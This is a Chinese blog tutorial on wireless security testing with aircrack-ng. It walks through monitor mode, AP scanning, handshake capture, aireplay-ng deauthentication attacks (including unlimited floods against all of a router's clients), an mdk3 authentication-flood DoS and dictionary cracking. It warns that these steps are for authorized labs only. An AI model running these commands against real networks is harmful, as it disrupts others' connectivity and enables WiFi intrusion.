aircrack-ng使用简述
学无线安全、做实验环境抓握手包时,Linux 上常用 aircrack-ng 这一套。下面是我当时记在笔记里的命令流水,仅限自有网络或已获授权的环境;未授权扫描、干扰他人 WiFi 违法。
当时环境:Kali / Ubuntu,USB 无线网卡支持 monitor 模式,接口名以 wlan0 为例,实际以 iw dev 或 ifconfig 为准。
1. 查看网卡
确认网卡名、是否 UP:
ifconfig
或:
iw dev
只有支持 monitor 模式的网卡才能做后面的嗅探。
2. 打开网卡混杂模式
Monitor 模式相当于把网卡切成「只听空中帧」的状态,接口名通常会变成 wlan0mon:
airmon-ng start wlan0
若提示有进程占用(NetworkManager、wpa_supplicant),可先:
airmon-ng check kill
再 start。做完实验记得 airmon-ng stop wlan0mon 恢复。
3. 嗅探附近AP
扫描周围 AP、信道、BSSID、关联客户端:
airodump-ng wlan0mon
盯某个目标 AP 时,可指定信道与输出文件,便于后面抓握手:
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
-w capture 会生成 capture-01.cap 等,供 aircrack-ng 跑字典。
4. 发动deauth攻击使目标重连
让客户端断开并重连,便于在握手阶段抓 EAPOL。仍须合法授权。
aireplay-ng -0 [攻击数量] –a [路由器MAC] -c [客户端MAC] wlan0mon
注意:原文里的 –a 可能是全角破折号,命令行请用半角 -a。
攻击数量设为0为无限循环模式
路口器MAC地址为必填项(应为「路由器」)
客户端MAC,可不填则对路由器所有的客户端进行攻击
示例:
aireplay-ng -0 5 -a D4:83:04:9F:37:28 -c 客户端MAC wlan0mon
5. 对路由器Dos攻击
mdk3 常与 aircrack-ng 一起装,可做认证洪水等,干扰性强,仅实验室自用:
sudo mdk3 mon0 a -a D4:83:04:9F:37:28
mon0 需换成你当前的 monitor 接口名(如 wlan0mon)。a 表示认证 DoS 模式,-a 后跟目标 AP 的 BSSID。
补充
完整破解流程还包括:抓够握手包 → aircrack-ng -w wordlist capture-01.cap 跑字典。本文只记了前期嗅探和 deauth 相关命令,字典与算力那是后话。网卡驱动、内核版本不同,命令报错时先查 airmon-ng 是否识别芯片。
版权声明: 本文首发于 指尖魔法屋-aircrack-ng使用简述(https://blog.thinkmoon.cn/post/373-notes-network-aircrack-ng/) 转载或引用必须申明原指尖魔法屋来源及源地址!